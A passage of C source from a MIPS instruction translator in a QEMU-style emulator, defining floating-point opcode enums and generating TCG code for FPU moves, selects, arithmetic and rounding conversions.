FOP(23, FMT_D), OPC_MADDF_D = FOP(24, FMT_D), OPC_MSUBF_D = FOP(25, FMT_D), OPC_RINT_D = FOP(26, FMT_D), OPC_CLASS_D = FOP(27, FMT_D), OPC_MIN_D = FOP(28, FMT_D), OPC_RECIP2_D = FOP(28, FMT_D), OPC_MINA_D = FOP(29, FMT_D), OPC_RECIP1_D = FOP(29, FMT_D), OPC_MAX_D = FOP(30, FMT_D), OPC_RSQRT1_D = FOP(30, FMT_D), OPC_MAXA_D = FOP(31, FMT_D), OPC_RSQRT2_D = FOP(31, FMT_D), OPC_CVT_S_D = FOP(32, FMT_D), OPC_CVT_W_D = FOP(36, FMT_D), OPC_CVT_L_D = FOP(37, FMT_D), OPC_CMP_F_D = FOP(48, FMT_D), OPC_CMP_UN_D = FOP(49, FMT_D), OPC_CMP_EQ_D = FOP(50, FMT_D), OPC_CMP_UEQ_D = FOP(51, FMT_D), OPC_CMP_OLT_D = FOP(52, FMT_D), OPC_CMP_ULT_D = FOP(53, FMT_D), OPC_CMP_OLE_D = FOP(54, FMT_D), OPC_CMP_ULE_D = FOP(55, FMT_D), OPC_CMP_SF_D = FOP(56, FMT_D), OPC_CMP_NGLE_D = FOP(57, FMT_D), OPC_CMP_SEQ_D = FOP(58, FMT_D), OPC_CMP_NGL_D = FOP(59, FMT_D), OPC_CMP_LT_D = FOP(60, FMT_D), OPC_CMP_NGE_D = FOP(61, FMT_D), OPC_CMP_LE_D = FOP(62, FMT_D), OPC_CMP_NGT_D = FOP(63, FMT_D), OPC_CVT_S_W = FOP(32, FMT_W), OPC_CVT_D_W = FOP(33, FMT_W), OPC_CVT_S_L = FOP(32, FMT_L), OPC_CVT_D_L = FOP(33, FMT_L), OPC_CVT_PS_PW = 
FOP(38, FMT_W), OPC_ADD_PS = FOP(0, FMT_PS), OPC_SUB_PS = FOP(1, FMT_PS), OPC_MUL_PS = FOP(2, FMT_PS), OPC_DIV_PS = FOP(3, FMT_PS), OPC_ABS_PS = FOP(5, FMT_PS), OPC_MOV_PS = FOP(6, FMT_PS), OPC_NEG_PS = FOP(7, FMT_PS), OPC_MOVCF_PS = FOP(17, FMT_PS), OPC_MOVZ_PS = FOP(18, FMT_PS), OPC_MOVN_PS = FOP(19, FMT_PS), OPC_ADDR_PS = FOP(24, FMT_PS), OPC_MULR_PS = FOP(26, FMT_PS), OPC_RECIP2_PS = FOP(28, FMT_PS), OPC_RECIP1_PS = FOP(29, FMT_PS), OPC_RSQRT1_PS = FOP(30, FMT_PS), OPC_RSQRT2_PS = FOP(31, FMT_PS), OPC_CVT_S_PU = FOP(32, FMT_PS), OPC_CVT_PW_PS = FOP(36, FMT_PS), OPC_CVT_S_PL = FOP(40, FMT_PS), OPC_PLL_PS = FOP(44, FMT_PS), OPC_PLU_PS = FOP(45, FMT_PS), OPC_PUL_PS = FOP(46, FMT_PS), OPC_PUU_PS = FOP(47, FMT_PS), OPC_CMP_F_PS = FOP(48, FMT_PS), OPC_CMP_UN_PS = FOP(49, FMT_PS), OPC_CMP_EQ_PS = FOP(50, FMT_PS), OPC_CMP_UEQ_PS = FOP(51, FMT_PS), OPC_CMP_OLT_PS = FOP(52, FMT_PS), OPC_CMP_ULT_PS = FOP(53, FMT_PS), OPC_CMP_OLE_PS = FOP(54, FMT_PS), OPC_CMP_ULE_PS = FOP(55, FMT_PS), OPC_CMP_SF_PS = FOP(56, FMT_PS), OPC_CMP_NGLE_PS = FOP(57, FMT_PS), OPC_CMP_SEQ_PS = FOP(58, FMT_PS), OPC_CMP_NGL_PS = FOP(59, FMT_PS), OPC_CMP_LT_PS = FOP(60, FMT_PS), OPC_CMP_NGE_PS = FOP(61, FMT_PS), OPC_CMP_LE_PS = FOP(62, FMT_PS), OPC_CMP_NGT_PS = FOP(63, FMT_PS), }; enum r6_f_cmp_op { R6_OPC_CMP_AF_S = FOP(0, FMT_W), R6_OPC_CMP_UN_S = FOP(1, FMT_W), R6_OPC_CMP_EQ_S = FOP(2, FMT_W), R6_OPC_CMP_UEQ_S = FOP(3, FMT_W), R6_OPC_CMP_LT_S = FOP(4, FMT_W), R6_OPC_CMP_ULT_S = FOP(5, FMT_W), R6_OPC_CMP_LE_S = FOP(6, FMT_W), R6_OPC_CMP_ULE_S = FOP(7, FMT_W), R6_OPC_CMP_SAF_S = FOP(8, FMT_W), R6_OPC_CMP_SUN_S = FOP(9, FMT_W), R6_OPC_CMP_SEQ_S = FOP(10, FMT_W), R6_OPC_CMP_SEUQ_S = FOP(11, FMT_W), R6_OPC_CMP_SLT_S = FOP(12, FMT_W), R6_OPC_CMP_SULT_S = FOP(13, FMT_W), R6_OPC_CMP_SLE_S = FOP(14, FMT_W), R6_OPC_CMP_SULE_S = FOP(15, FMT_W), R6_OPC_CMP_OR_S = FOP(17, FMT_W), R6_OPC_CMP_UNE_S = FOP(18, FMT_W), R6_OPC_CMP_NE_S = FOP(19, FMT_W), R6_OPC_CMP_SOR_S = FOP(25, FMT_W), R6_OPC_CMP_SUNE_S = FOP(26, FMT_W), R6_OPC_CMP_SNE_S = FOP(27, FMT_W), R6_OPC_CMP_AF_D = FOP(0, FMT_L), R6_OPC_CMP_UN_D = FOP(1, FMT_L), R6_OPC_CMP_EQ_D = FOP(2, FMT_L), R6_OPC_CMP_UEQ_D = FOP(3, FMT_L), R6_OPC_CMP_LT_D = FOP(4, FMT_L), R6_OPC_CMP_ULT_D = FOP(5, FMT_L), R6_OPC_CMP_LE_D = FOP(6, FMT_L), R6_OPC_CMP_ULE_D = FOP(7, FMT_L), R6_OPC_CMP_SAF_D = FOP(8, FMT_L), R6_OPC_CMP_SUN_D = FOP(9, FMT_L), R6_OPC_CMP_SEQ_D = FOP(10, FMT_L), R6_OPC_CMP_SEUQ_D = FOP(11, FMT_L), R6_OPC_CMP_SLT_D = FOP(12, FMT_L), R6_OPC_CMP_SULT_D = FOP(13, FMT_L), R6_OPC_CMP_SLE_D = FOP(14, FMT_L), R6_OPC_CMP_SULE_D = FOP(15, FMT_L), R6_OPC_CMP_OR_D = FOP(17, FMT_L), R6_OPC_CMP_UNE_D = FOP(18, FMT_L), R6_OPC_CMP_NE_D = FOP(19, FMT_L), R6_OPC_CMP_SOR_D = FOP(25, FMT_L), R6_OPC_CMP_SUNE_D = FOP(26, FMT_L), R6_OPC_CMP_SNE_D = FOP(27, FMT_L), }; static void gen_cp1(DisasContext *ctx, uint32_t opc, int rt, int fs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); switch (opc) { case OPC_MFC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_MTC1: gen_load_gpr(tcg_ctx, t0, rt); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32(ctx, fp0, fs); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CFC1: gen_helper_1e0i(cfc1, t0, fs); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_CTC1: gen_load_gpr(tcg_ctx, t0, rt); save_cpu_state(ctx, 0); { TCGv_i32 fs_tmp = 
tcg_const_i32(tcg_ctx, fs); gen_helper_0e2i(ctc1, t0, fs_tmp, rt); tcg_temp_free_i32(tcg_ctx, fs_tmp); } /* Stop translation as we may have changed hflags */ ctx->base.is_jmp = DISAS_STOP; break; #if defined(TARGET_MIPS64) case OPC_DMFC1: gen_load_fpr64(ctx, t0, fs); gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_DMTC1: gen_load_gpr(tcg_ctx, t0, rt); gen_store_fpr64(ctx, t0, fs); break; #endif case OPC_MFHC1: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); tcg_gen_ext_i32_tl(tcg_ctx, t0, fp0); tcg_temp_free_i32(tcg_ctx, fp0); } gen_store_gpr(tcg_ctx, t0, rt); break; case OPC_MTHC1: gen_load_gpr(tcg_ctx, t0, rt); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32h(ctx, fp0, fs); tcg_temp_free_i32(tcg_ctx, fp0); } break; default: MIPS_INVAL("cp1 move"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); } static void gen_movci(DisasContext *ctx, int rd, int rs, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1; TCGCond cond; TCGv_i32 t0; if (rd == 0) { /* Treat as NOP. */ return; } if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } l1 = gen_new_label(tcg_ctx); t0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); tcg_temp_free_i32(tcg_ctx, t0); if (rs == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } gen_set_label(tcg_ctx, l1); } static inline void gen_movcf_s(DisasContext *ctx, int fs, int fd, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); gen_load_fpr32(ctx, t0, fs); gen_store_fpr32(ctx, t0, fd); gen_set_label(tcg_ctx, l1); tcg_temp_free_i32(tcg_ctx, t0); } static inline void gen_movcf_d(DisasContext *ctx, int fs, int fd, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp0; TCGLabel *l1 = gen_new_label(tcg_ctx); if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); tcg_temp_free_i32(tcg_ctx, t0); fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } static inline void gen_movcf_ps(DisasContext *ctx, int fs, int fd, int cc, int tf) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int cond; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); if (tf) { cond = TCG_COND_EQ; } else { cond = TCG_COND_NE; } tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l1); gen_load_fpr32(ctx, t0, fs); gen_store_fpr32(ctx, t0, fd); gen_set_label(tcg_ctx, l1); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->fpu_fcr31, 1 << get_fp_bit(cc + 1)); tcg_gen_brcondi_i32(tcg_ctx, cond, t0, 0, l2); gen_load_fpr32h(ctx, t0, fs); gen_store_fpr32h(ctx, t0, fd); tcg_temp_free_i32(tcg_ctx, t0); gen_set_label(tcg_ctx, l2); } static void gen_sel_s(DisasContext *ctx, enum fopcode op1, int fd, int ft, int fs) { TCGContext 
*tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fd); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fs); switch (op1) { case OPC_SEL_S: tcg_gen_andi_i32(tcg_ctx, fp0, fp0, 1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); break; case OPC_SELEQZ_S: tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); break; case OPC_SELNEZ_S: tcg_gen_andi_i32(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); break; default: MIPS_INVAL("gen_sel_s"); generate_exception_end(ctx, EXCP_RI); break; } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, t1); } static void gen_sel_d(DisasContext *ctx, enum fopcode op1, int fd, int ft, int fs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t1 = tcg_const_i64(tcg_ctx, 0); TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fd); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fs); switch (op1) { case OPC_SEL_D: tcg_gen_andi_i64(tcg_ctx, fp0, fp0, 1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp0, t1, fp1, fp2); break; case OPC_SELEQZ_D: tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, fp0, fp1, t1, fp2, t1); break; case OPC_SELNEZ_D: tcg_gen_andi_i64(tcg_ctx, fp1, fp1, 1); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, fp0, fp1, t1, fp2, t1); break; default: MIPS_INVAL("gen_sel_d"); generate_exception_end(ctx, EXCP_RI); break; } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp2); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, t1); } static void gen_farith(DisasContext *ctx, enum fopcode op1, int ft, int fs, int fd, int cc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t func = ctx->opcode & 0x3f; switch (op1) { case OPC_ADD_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_add_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SUB_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_sub_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MUL_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_mul_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_DIV_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_div_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SQRT_S: { TCGv_i32 fp0 = 
tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_sqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_ABS_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_andi_i32(tcg_ctx, fp0, fp0, 0x7fffffffUL); } else { gen_helper_float_abs_s(tcg_ctx, fp0, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MOV_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_NEG_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_xori_i32(tcg_ctx, fp0, fp0, 1UL << 31); } else { gen_helper_float_chs_s(tcg_ctx, fp0, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_ROUND_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_round_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_round_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_TRUNC_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_trunc_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CEIL_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_ceil_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_FLOOR_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_floor_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_ROUND_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_round_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_round_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_TRUNC_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_trunc_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CEIL_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } 
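/* * ctx->nan2008 mirrors the FCSR NAN2008 mode bit: when it is set, the * *_2008 helpers above apply IEEE 754-2008 NaN handling to the * conversion; the else branch below keeps the legacy MIPS behaviour. */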
else { gen_helper_float_ceil_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_FLOOR_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_floor_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SEL_S: check_insn(ctx, ISA_MIPS32R6); gen_sel_s(ctx, op1, fd, ft, fs); break; case OPC_SELEQZ_S: check_insn(ctx, ISA_MIPS32R6); gen_sel_s(ctx, op1, fd, ft, fs); break; case OPC_SELNEZ_S: check_insn(ctx, ISA_MIPS32R6); gen_sel_s(ctx, op1, fd, ft, fs); break; case OPC_MOVCF_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movcf_s(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); break; case OPC_MOVZ_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i32 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[ft], 0, l1); } fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } break; case OPC_MOVN_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i32 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[ft], 0, l1); fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } } break; case OPC_RECIP_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_recip_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_RSQRT_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_rsqrt_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MADDF_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fd); gen_helper_float_maddf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MSUBF_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fd); gen_helper_float_msubf_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_RINT_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_rint_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CLASS_S: check_insn(ctx, ISA_MIPS32R6); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_class_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_MIN_S: /* 
OPC_RECIP2_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MIN_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_min_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RECIP2_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_recip2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_MINA_S: /* OPC_RECIP1_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MINA_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_mina_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RECIP1_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_recip1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_MAX_S: /* OPC_RSQRT1_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAX_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_max_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp1, fd); tcg_temp_free_i32(tcg_ctx, fp1); 